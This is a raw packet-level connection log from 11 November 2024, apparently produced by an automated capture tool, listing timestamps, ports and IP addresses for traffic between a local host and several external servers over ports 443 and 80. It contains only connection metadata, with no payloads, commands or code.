Nov 11, 2024 01:14:09.267528057 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:09.273833036 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.280940056 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.280993938 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.281021118 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:09.281028032 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.281081915 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:09.285329103 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.291376114 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.291400909 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.291426897 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:09.291433096 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.291477919 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:09.297590017 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.303539991 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.303579092 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.303612947 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:09.303620100 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.303659916 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:09.309601068 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.315493107 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.315565109 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:09.315568924 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.321603060 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.321644068 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.321671963 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:09.321679115 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.321723938 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:09.327570915 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.333755970 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.333785057 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.333822966 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:09.333828926 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.333873034 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:09.339777946 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.345824957 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.345876932 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.345904112 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:09.345907927 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.345952034 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:09.373943090 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.374108076 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.374146938 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.374157906 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:09.374162912 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.374191999 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.374214888 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:09.374219894 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.374264956 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:09.374269009 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.376779079 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.376837015 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:09.376842022 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.380429983 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.380469084 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.380481005 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:09.380485058 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.380530119 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:09.386832952 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.391113043 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.391144991 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.391179085 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:09.391184092 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.391235113 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:09.394510984 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.397707939 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.397735119 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.397758007 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:09.397763968 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.397806883 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:09.397921085 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:09.397953033 CET	443	49745	172.217.18.14	192.168.2.4
Nov 11, 2024 01:14:09.398011923 CET	49745	443	192.168.2.4	172.217.18.14
Nov 11, 2024 01:14:09.584316969 CET	443	49747	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:09.584636927 CET	49747	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:09.584655046 CET	443	49747	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:09.585513115 CET	443	49747	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:09.585575104 CET	49747	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:09.585891008 CET	49747	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:09.585942030 CET	443	49747	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:09.635545015 CET	49747	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:09.635554075 CET	443	49747	172.217.16.196	192.168.2.4
Nov 11, 2024 01:14:09.682410955 CET	49747	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:09.807167053 CET	443	49748	142.250.186.110	192.168.2.4
Nov 11, 2024 01:14:09.807446957 CET	49748	443	192.168.2.4	142.250.186.110
Nov 11, 2024 01:14:09.807459116 CET	443	49748	142.250.186.110	192.168.2.4
Nov 11, 2024 01:14:09.807821035 CET	443	49748	142.250.186.110	192.168.2.4
Nov 11, 2024 01:14:09.807899952 CET	49748	443	192.168.2.4	142.250.186.110
Nov 11, 2024 01:14:09.808506966 CET	443	49748	142.250.186.110	192.168.2.4
Nov 11, 2024 01:14:09.808567047 CET	49748	443	192.168.2.4	142.250.186.110
Nov 11, 2024 01:14:09.809456110 CET	49748	443	192.168.2.4	142.250.186.110
Nov 11, 2024 01:14:09.809514999 CET	443	49748	142.250.186.110	192.168.2.4
Nov 11, 2024 01:14:09.809731960 CET	49748	443	192.168.2.4	142.250.186.110
Nov 11, 2024 01:14:09.809739113 CET	443	49748	142.250.186.110	192.168.2.4
Nov 11, 2024 01:14:09.809750080 CET	49748	443	192.168.2.4	142.250.186.110
Nov 11, 2024 01:14:09.851339102 CET	443	49748	142.250.186.110	192.168.2.4
Nov 11, 2024 01:14:09.853517056 CET	49748	443	192.168.2.4	142.250.186.110
Nov 11, 2024 01:14:10.097917080 CET	443	49748	142.250.186.110	192.168.2.4
Nov 11, 2024 01:14:10.150336027 CET	49748	443	192.168.2.4	142.250.186.110
Nov 11, 2024 01:14:10.150347948 CET	443	49748	142.250.186.110	192.168.2.4
Nov 11, 2024 01:14:10.151885986 CET	49748	443	192.168.2.4	142.250.186.110
Nov 11, 2024 01:14:10.151923895 CET	443	49748	142.250.186.110	192.168.2.4
Nov 11, 2024 01:14:10.151979923 CET	49748	443	192.168.2.4	142.250.186.110
Nov 11, 2024 01:14:10.305391073 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:10.306368113 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:10.310309887 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:10.312257051 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:10.312326908 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:10.312462091 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:10.312462091 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:10.318547010 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:10.318557978 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:11.199883938 CET	49755	443	192.168.2.4	142.250.186.110
Nov 11, 2024 01:14:11.199925900 CET	443	49755	142.250.186.110	192.168.2.4
Nov 11, 2024 01:14:11.200092077 CET	49755	443	192.168.2.4	142.250.186.110
Nov 11, 2024 01:14:11.200711012 CET	49755	443	192.168.2.4	142.250.186.110
Nov 11, 2024 01:14:11.200723886 CET	443	49755	142.250.186.110	192.168.2.4
Nov 11, 2024 01:14:11.747387886 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:11.747441053 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:11.844481945 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:11.844515085 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:11.849407911 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:11.849421978 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:11.849433899 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:11.853332996 CET	49747	443	192.168.2.4	172.217.16.196
Nov 11, 2024 01:14:11.853377104 CET	49755	443	192.168.2.4	142.250.186.110
Nov 11, 2024 01:14:12.627500057 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:12.627561092 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:12.641736984 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:12.646565914 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:12.815958977 CET	49756	443	192.168.2.4	172.202.163.200
Nov 11, 2024 01:14:12.815994978 CET	443	49756	172.202.163.200	192.168.2.4
Nov 11, 2024 01:14:12.816736937 CET	49756	443	192.168.2.4	172.202.163.200
Nov 11, 2024 01:14:12.817888021 CET	49756	443	192.168.2.4	172.202.163.200
Nov 11, 2024 01:14:12.817904949 CET	443	49756	172.202.163.200	192.168.2.4
Nov 11, 2024 01:14:13.421807051 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:13.421901941 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:13.573188066 CET	443	49756	172.202.163.200	192.168.2.4
Nov 11, 2024 01:14:13.573256969 CET	49756	443	192.168.2.4	172.202.163.200
Nov 11, 2024 01:14:13.576821089 CET	49756	443	192.168.2.4	172.202.163.200
Nov 11, 2024 01:14:13.576828003 CET	443	49756	172.202.163.200	192.168.2.4
Nov 11, 2024 01:14:13.577167034 CET	443	49756	172.202.163.200	192.168.2.4
Nov 11, 2024 01:14:13.619205952 CET	49756	443	192.168.2.4	172.202.163.200
Nov 11, 2024 01:14:13.838046074 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:13.842874050 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:14.425295115 CET	49756	443	192.168.2.4	172.202.163.200
Nov 11, 2024 01:14:14.467328072 CET	443	49756	172.202.163.200	192.168.2.4
Nov 11, 2024 01:14:14.615104914 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:14.618195057 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:14.675134897 CET	443	49756	172.202.163.200	192.168.2.4
Nov 11, 2024 01:14:14.675157070 CET	443	49756	172.202.163.200	192.168.2.4
Nov 11, 2024 01:14:14.675164938 CET	443	49756	172.202.163.200	192.168.2.4
Nov 11, 2024 01:14:14.675237894 CET	49756	443	192.168.2.4	172.202.163.200
Nov 11, 2024 01:14:14.675250053 CET	443	49756	172.202.163.200	192.168.2.4
Nov 11, 2024 01:14:14.675267935 CET	443	49756	172.202.163.200	192.168.2.4
Nov 11, 2024 01:14:14.675275087 CET	443	49756	172.202.163.200	192.168.2.4
Nov 11, 2024 01:14:14.675331116 CET	49756	443	192.168.2.4	172.202.163.200
Nov 11, 2024 01:14:14.675331116 CET	49756	443	192.168.2.4	172.202.163.200
Nov 11, 2024 01:14:14.675338984 CET	443	49756	172.202.163.200	192.168.2.4
Nov 11, 2024 01:14:14.675350904 CET	443	49756	172.202.163.200	192.168.2.4
Nov 11, 2024 01:14:14.675414085 CET	49756	443	192.168.2.4	172.202.163.200
Nov 11, 2024 01:14:14.675421953 CET	443	49756	172.202.163.200	192.168.2.4
Nov 11, 2024 01:14:14.675841093 CET	443	49756	172.202.163.200	192.168.2.4
Nov 11, 2024 01:14:14.675982952 CET	49756	443	192.168.2.4	172.202.163.200
Nov 11, 2024 01:14:14.852622032 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:14.857472897 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.136056900 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.136076927 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.136090040 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.136102915 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.136112928 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.136126041 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.136136055 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.136133909 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.136148930 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.136159897 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.136207104 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.136389971 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.136423111 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.136435986 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.136495113 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.136614084 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.136636019 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.136646032 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.136672974 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.136698008 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.137032986 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.137082100 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.140918970 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.140966892 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.290827990 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.290841103 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.290847063 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.290889978 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.290899038 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.291028976 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.291042089 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.291055918 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.291071892 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.291095018 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.291105986 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.291115999 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.291122913 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.291142941 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.291167021 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.291719913 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.291733027 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.291743040 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.291754961 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.291773081 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.291810989 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.292144060 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.292156935 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.292167902 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.292188883 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.292201996 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.292212963 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.292217970 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.292224884 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.292234898 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.292268038 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.292851925 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.292862892 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.292874098 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.292885065 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.292897940 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.292915106 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.316241026 CET	49756	443	192.168.2.4	172.202.163.200
Nov 11, 2024 01:14:15.316256046 CET	443	49756	172.202.163.200	192.168.2.4
Nov 11, 2024 01:14:15.316287994 CET	49756	443	192.168.2.4	172.202.163.200
Nov 11, 2024 01:14:15.316294909 CET	443	49756	172.202.163.200	192.168.2.4
Nov 11, 2024 01:14:15.414156914 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.414225101 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.445956945 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.445995092 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.446008921 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.446017027 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.446027994 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.446063042 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.446095943 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.446173906 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.446190119 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.446198940 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.446249008 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.446273088 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.446305037 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.446316004 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.446353912 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.446443081 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.446456909 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.446468115 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.446484089 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.446487904 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.446496964 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.446508884 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.446511030 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.446530104 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.446552038 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.447011948 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.447022915 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.447061062 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.447098017 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.447139025 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.447139978 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.447151899 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.447163105 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.447180986 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.447213888 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.447499037 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.447510958 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.447521925 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.447552919 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.447573900 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.447580099 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.447596073 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.447618961 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.447650909 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.447671890 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.447997093 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.448035955 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.448046923 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.448081017 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.448092937 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.448113918 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.448132038 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.448143959 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.448156118 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.448164940 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.448169947 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.448180914 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.448190928 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.448191881 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.448211908 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.448236942 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.448928118 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.448972940 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.448993921 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.449006081 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.449017048 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.449029922 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.449065924 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.449362993 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.458172083 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.458182096 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.458193064 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.458204985 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.458215952 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.458237886 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.458256960 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.537384033 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.537403107 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.537412882 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.537422895 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.537475109 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.537493944 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.600557089 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.600569010 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.600600958 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.600610018 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.600611925 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.600666046 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.600697041 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.600714922 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.600727081 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.600733042 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.600738049 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.600750923 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.600756884 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.600790024 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.600979090 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.601018906 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.601052999 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.601063967 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.601104021 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.601125956 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.601136923 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.601146936 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:15.601174116 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.601187944 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:15.601280928 CET	80	49753	185.215.113.206	192.168.2.4
